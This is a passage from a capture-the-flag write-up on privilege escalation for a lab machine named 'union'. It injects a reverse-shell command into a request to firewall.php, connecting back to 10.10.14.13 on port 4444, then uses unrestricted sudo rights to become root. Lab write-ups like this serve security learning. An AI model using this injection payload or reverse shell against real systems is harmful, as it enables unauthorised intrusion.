PrivEsc

Observation, when submitting the flag it makes two requests, one on challenge.php and firewall.php. We can and modify the second request to firewall.php

; bash -c "bash -i >& /dev/tcp/10.10.14.13/4444 0>&1";

We get a shell back. We cannot access the /root folder yet.

sudo -l
Matching Defaults entries for www-data on union:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on union:
    (ALL : ALL) NOPASSWD: ALL

But we can run any command as sudo so we can escalate our privilege with simply sudo su.

PreviousEnumeration NextDelivery

Last updated 1 year ago